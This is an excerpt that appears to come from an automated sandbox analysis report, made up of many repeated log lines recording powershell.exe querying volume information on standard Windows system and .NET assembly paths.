Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
